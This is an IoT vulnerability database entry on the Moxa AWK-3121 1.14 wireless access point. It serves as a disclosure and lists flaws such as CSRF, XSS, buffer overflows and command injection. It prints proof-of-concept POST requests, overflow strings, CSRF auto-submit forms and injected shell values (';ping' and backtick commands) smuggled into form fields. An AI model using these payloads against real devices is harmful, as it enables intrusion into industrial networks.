VARIoT IoT vulnerabilities database

An issue was discovered on Moxa AWK-3121 1.14 devices. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well. Moxa AWK-3121 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MoxaAWK-3121 is an industrial-grade wireless access point for Moxa Corporation of Taiwan, China. There is a cryptographic vulnerability in the MoxaAWK-31211.14 release. The vulnerability stems from the network system or product not using the relevant cryptographic algorithm correctly, resulting in content not being properly encrypted, weakly encrypted, and plaintext storage sensitive information. A trust management issue vulnerability exists in Moxa AWK-3121 version 1.14. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. ------------------------------------------ [VulnerabilityType Other] HTTP traffic by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 2. It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization. ------------------------------------------ [Additional Information] POC http://192.168.127.253//systemlog.log ------------------------------------------ [Vulnerability Type] Incorrect Access Control ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 3. The session cookie "Password508" does not have an HttpOnly flag. This allows an attacker who is able to execute a cross-site scripting attack to steal the cookie very easily. ------------------------------------------ [VulnerabilityType Other] Missing HttpOnly flag on session cookie ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 4. It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0 srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 5. ------------------------------------------ [VulnerabilityType Other] Open WiFi Connection ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Device ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 6. It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. However, the same functionality allows an attacker to execute commands on the device. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.) ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 7. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs. ------------------------------------------ [Additional Information] POC to change name of the device <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html <html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Request Forgery (CSRF) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 8. The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333 srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [VulnerabilityType Other] Command injection in Ping functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 9. The device enables an unencrypted TELNET service by default. ------------------------------------------ [VulnerabilityType Other] Insecure service Telnet enabled by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Telnet daemon ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 10. The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_privatePass" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562 ... 114782935826962 Content-Disposition: form-data; name="iw_privatePass" ;`ping -c 9 192.168.127.103` ## ... 114782935826962 Content-Disposition: form-data; name="bkpath" /wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection" certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex" 0 ... 114782935826962 Content-Disposition: form-data; name="Submit" Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1" test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml <a id="a"<b id="b"hey!</b</a ... 114782935826962-- ------------------------------------------ [VulnerabilityType Other] Command injection in file upload ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 11. It provides functionality so that an administrator can change the name of the device. However, the same functionality allows an attacker to execute XSS by injecting an XSS payload. The POST parameter "iw_board_deviceName" is susceptible to this injection. ------------------------------------------ [Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.9 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 12. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to buffer overflow. By crafting a packet that contains a string of 162 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" `ping -c 3 192.168.127.101` ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 13. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters. ------------------------------------------ [Additional Information] POC <html <body <script function submitRequest() { var formData = new FormData(); formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##"); formData.append("iw_storage", "tftp"); formData.append("iw_serverip", "192.168.1.101"); formData.append("bkpath", "/wireless_cert.asp?index=1"); // HTML file input, chosen by user formData.append("certFile1", "test.txt"); // JavaScript file-like object var content = '<a id="a"<b id="b"hey!</b</a'; // the body of the new file... var blob = new Blob([content], { type: "text/xml"}); formData.append("certFile", blob); var request = new XMLHttpRequest(); request.open("POST", "http://192.168.127.253/forms/web_certUpload"); request.send(formData); } </script <form action="#" <input type="submit" value="Submit request" onclick="submitRequest();" / </form </body </html ------------------------------------------ [VulnerabilityType Other] Command injection in web runscript functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 14. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_serverip" is susceptible to buffer overflow. By crafting a packet that contains a string of 480 characters, it is possible for an attacker to execute the attack. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628 ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="XXXX" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" AAAAAAAAAAAAAAAAAA (etc.) ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley

An issue was discovered on Moxa AWK-3121 1.14 devices. The session cookie "Password508" does not have an HttpOnly flag. This allows an attacker who is able to execute a cross-site scripting attack to steal the cookie very easily. Moxa AWK-3121 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. ------------------------------------------ [VulnerabilityType Other] HTTP traffic by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 2. It is intended that an administrator can download /systemlog.log (the system log). However, the same functionality allows an attacker to download the file without any authentication or authorization. ------------------------------------------ [Additional Information] POC http://192.168.127.253//systemlog.log ------------------------------------------ [Vulnerability Type] Incorrect Access Control ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 3. ------------------------------------------ [VulnerabilityType Other] Missing HttpOnly flag on session cookie ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 4. It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to a buffer overflow. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0 srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 5. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well. ------------------------------------------ [VulnerabilityType Other] Open WiFi Connection ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Device ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 6. It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device's network. The POST parameters "to1,to2,to3,to4" are all susceptible to buffer overflow. ------------------------------------------ [Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.) ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 7. The device provides a web interface to allow an administrator to manage the device. However, this interface is not protected against CSRF attacks, which allows an attacker to trick an administrator into executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and forms/webSetMainRestart URIs. ------------------------------------------ [Additional Information] POC to change name of the device <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html <html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Request Forgery (CSRF) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 8. The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. The POST parameter "srvName" is susceptible to this injection. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333 srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [VulnerabilityType Other] Command injection in Ping functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 9. The device enables an unencrypted TELNET service by default. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user. ------------------------------------------ [VulnerabilityType Other] Insecure service Telnet enabled by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Telnet daemon ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 10. The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. The POST parameter "iw_privatePass" is susceptible to this injection. ------------------------------------------ [Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562 ... 114782935826962 Content-Disposition: form-data; name="iw_privatePass" ;`ping -c 9 192.168.127.103` ## ... 114782935826962 Content-Disposition: form-data; name="bkpath" /wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection" certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex" 0 ... 114782935826962 Content-Disposition: form-data; name="Submit" Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1" test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml <a id="a"<b id="b"hey!</b</a ... 114782935826962-- ------------------------------------------ [VulnerabilityType Other] Command injection in file upload ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 11. It provides functionality so that an administrator can change the name of the device. The POST parameter "iw_board_deviceName" is susceptible to this injection. ------------------------------------------ [Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.9 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 12. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. The POST parameter "iw_filename" is susceptible to buffer overflow. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" `ping -c 3 192.168.127.101` ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 13. It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters. ------------------------------------------ [Additional Information] POC <html <body <script function submitRequest() { var formData = new FormData(); formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##"); formData.append("iw_storage", "tftp"); formData.append("iw_serverip", "192.168.1.101"); formData.append("bkpath", "/wireless_cert.asp?index=1"); // HTML file input, chosen by user formData.append("certFile1", "test.txt"); // JavaScript file-like object var content = '<a id="a"<b id="b"hey!</b</a'; // the body of the new file... var blob = new Blob([content], { type: "text/xml"}); formData.append("certFile", blob); var request = new XMLHttpRequest(); request.open("POST", "http://192.168.127.253/forms/web_certUpload"); request.send(formData); } </script <form action="#" <input type="submit" value="Submit request" onclick="submitRequest();" / </form </body </html ------------------------------------------ [VulnerabilityType Other] Command injection in web runscript functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request 